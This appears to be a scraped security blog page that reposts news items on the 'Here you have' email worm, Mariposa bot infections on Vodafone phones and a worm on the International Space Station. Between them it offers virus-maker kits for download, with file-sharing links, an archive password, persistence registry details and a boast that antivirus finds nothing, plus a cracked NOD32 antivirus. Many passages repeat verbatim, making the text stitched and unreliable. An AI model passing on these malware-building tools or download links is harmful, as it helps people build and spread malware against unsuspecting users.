A fast-moving email worm that began spreading on Thursday has been able to affect hundreds of thousands of computers worldwide, anti-virus provider Symantec warned.
The email arrives with the subject “Here you have.” An executable screensaver that’s disguised as a PDF document then tries to send the same message to everyone listed in the recipient’s address book. The .scr file is a variation of the W32.Imsolk.A@mm worm Symantec discovered last month.
In addition to spreading through email, it can propagate through mapped drives, autorun and instant messenger. It also has the ability to disable various security programs.
The worm is a throwback to attacks not seen in almost a decade, when the Anna Kournikova and I Love You attacks wreaked havoc on email systems worldwide. The Here You Go worm appears to different in that the malicious payload is downloaded from a page on members.multimania.com, rather than being attached to the email. That could make efforts to eradicate the worm easier.
Then again, McAfee said multiple variants of the worm appear to be spreading, so it’s not yet clear that the malicious screensaver is hosted by a single source.
Source: The Register
More Info: New Round of Email Worm, “Here you have”
Vodafone Distributes Mariposa Botnet:
Here is yet another example of a company distributing malware to its userbase. Unfortunately it probably won’t be the last.
Today one of our colleagues received a brand new Vodafone HTC Magic with Google’s Android OS. “Neat” she said. Vodafone distributes this phone to its userbase in some European countries and it seems affordable as you can get it for 0€ or 1€ under certain conditions.
The interesting thing is that when she plugged the phone to her PC via USB her Panda Cloud Antivirus went off, detecting both an autorun.inf and autorun.exe as malicious. A quick look into the phone quickly revealed it was infected and spreading the infection to any and all PCs that the phone would be plugged into.
A quick analysis of the malware reveals that it is in fact a Mariposa bot client. This one, unlike the one announced last week which was run by spanish hacker group “DDP Team”, is run by some guy named “tnls” as the botnet-control mechanism shows:
Interestingly enough, the Mariposa bot is not the only malware I found on the Vodafone HTC Magic phone. There’s also a Confiker and a Lineage password stealing malware. I wonder who’s doing QA at Vodafone and HTC these days.
Source: Panda Research Blog
Today one of our colleagues received a brand new Vodafone HTC Magic with Google’s Android OS. “Neat” she said. Vodafone distributes this phone to its userbase in some European countries and it seems affordable as you can get it for 0€ or 1€ under certain conditions.
The interesting thing is that when she plugged the phone to her PC via USB her Panda Cloud Antivirus went off, detecting both an autorun.inf and autorun.exe as malicious. A quick look into the phone quickly revealed it was infected and spreading the infection to any and all PCs that the phone would be plugged into.
A quick analysis of the malware reveals that it is in fact a Mariposa bot client. This one, unlike the one announced last week which was run by spanish hacker group “DDP Team”, is run by some guy named “tnls” as the botnet-control mechanism shows:
00129953 |. 81F2 736C6E74 |XOR EDX,746E6C73 ; ”tnls”The Command & Control servers which it connects to via UDP to receive instructions are:
mx5.nadnadzz2.infoOnce infected you can see the malware “phoning home” to receive further instructions, probably to steal all of the user’s credentials and send them to the malware writer.
mx5.channeltrb123trb.com
mx5.ka3ek2.com
Interestingly enough, the Mariposa bot is not the only malware I found on the Vodafone HTC Magic phone. There’s also a Confiker and a Lineage password stealing malware. I wonder who’s doing QA at Vodafone and HTC these days.
Source: Panda Research Blog
TeraBIT Virus Maker 2.8 SE:
TeraBIT Virus Maker 2.8 SE
(Backdoor.Win32.VB.bna)
by m_reza00
Written in Visual Basic
Released in September 2007
Made in Iran
dropped files:
c:\WINDOWS\system32\csmm.exe
Size: 16,950 bytes
startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell”
Old data: Explorer.exe
New data: explorer.exe C:\WINDOWS\system32\csmm.exe
Tested on Windows XP
September 19, 2007
Download :
Virus Maker Professional 2008
Scanned By Kaspersky Internet Security 325, Nothing Found
Just Use it with all ur Own Risk to produce any Malicious/virus/Trojans/Spyware
All Info inside rar
Download :
http://www.4shared.com/file/43506955/93326338/CreAtive_By_Dark_Man_2009.html
http://www.2shared.com/file/3115492/e3275d24/CreAtive_By_Dark_Man_2009.html
http://rapidshare.com/files/99661790…k_Man_2009.rar
Password : LoloUOwnRisk
(Backdoor.Win32.VB.bna)
by m_reza00
Written in Visual Basic
Released in September 2007
Made in Iran
dropped files:
c:\WINDOWS\system32\csmm.exe
Size: 16,950 bytes
startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell”
Old data: Explorer.exe
New data: explorer.exe C:\WINDOWS\system32\csmm.exe
Tested on Windows XP
September 19, 2007
Download :
http://rapidshare.com/files/96994198/TeraBIT_VM_2_1.8.zip.htmlVirus Maker Professional 2008
Virus Maker Professional 2008
Scanned By Kaspersky Internet Security 325, Nothing Found
Just Use it with all ur Own Risk to produce any Malicious/virus/Trojans/Spyware
All Info inside rar
Download :
http://www.4shared.com/file/43506955/93326338/CreAtive_By_Dark_Man_2009.html
http://www.2shared.com/file/3115492/e3275d24/CreAtive_By_Dark_Man_2009.html
http://rapidshare.com/files/99661790…k_Man_2009.rar
Password : LoloUOwnRisk
ESET NOD32 Antivirus v3.0.672 Business Edition Full:
ESET NOD32 Antivirus System – Integrated, Real-Time Protection against viruses, worms, trojans, spyware, adware, phishing, and hackers. Best detection, fastest performance & smallest footprint.
NOD32 Antivirus System provides well balanced, state-of-the-art protection against threats endangering your PC and enterprise systems running various platforms from Microsoft Windows, through a number of UNIX/Linux, Novell, MS DOS operating systems to Microsoft Exchange Server, Lotus Domino and other mail servers.
Changes in version 3.0.672:
• Fixed problem causing instability on Microsoft Windows Vista 64-bit
• Fixed problem in anti spam module causing “Unexpected exception 003 and 007″ error messages
Size:19.6 MB
Download NOD32 Antivirus 3.0.672 Business :
http://rapidshare.com/files/147336388/ESET_NOD32_Antivirus_v3.0.672_Business_Edition_Full.rar
NOD32 Antivirus System provides well balanced, state-of-the-art protection against threats endangering your PC and enterprise systems running various platforms from Microsoft Windows, through a number of UNIX/Linux, Novell, MS DOS operating systems to Microsoft Exchange Server, Lotus Domino and other mail servers.
Changes in version 3.0.672:
• Fixed problem causing instability on Microsoft Windows Vista 64-bit
• Fixed problem in anti spam module causing “Unexpected exception 003 and 007″ error messages
Size:19.6 MB
Download NOD32 Antivirus 3.0.672 Business :
http://rapidshare.com/files/147336388/ESET_NOD32_Antivirus_v3.0.672_Business_Edition_Full.rar
International Space Station Infected By Virus:
NASA confirmed this week that a computer on the International Space Station is infected with a virus.
The malicious software is called W32.TGammima.AG, and technically it’s a worm.
The interesting point, other than how NASA could let this happen, is the way the worm spreads–on USB flash drives.
Malicious software spread by USB flash drives and other removable media takes advantage of a questionable design decision by Microsoft.
Windows is very happy to run a program automatically when a USB flash drive is inserted into a PC.
How convenient, both for end users and for bad guys.
Source : CNET
The interesting point, other than how NASA could let this happen, is the way the worm spreads–on USB flash drives.
Malicious software spread by USB flash drives and other removable media takes advantage of a questionable design decision by Microsoft.
Windows is very happy to run a program automatically when a USB flash drive is inserted into a PC.
How convenient, both for end users and for bad guys.
Source : CNET
http://news.cnet.com/8301-13554_3-10027754-33.html
Try us on Wibiya!
0 comments:
Post a Comment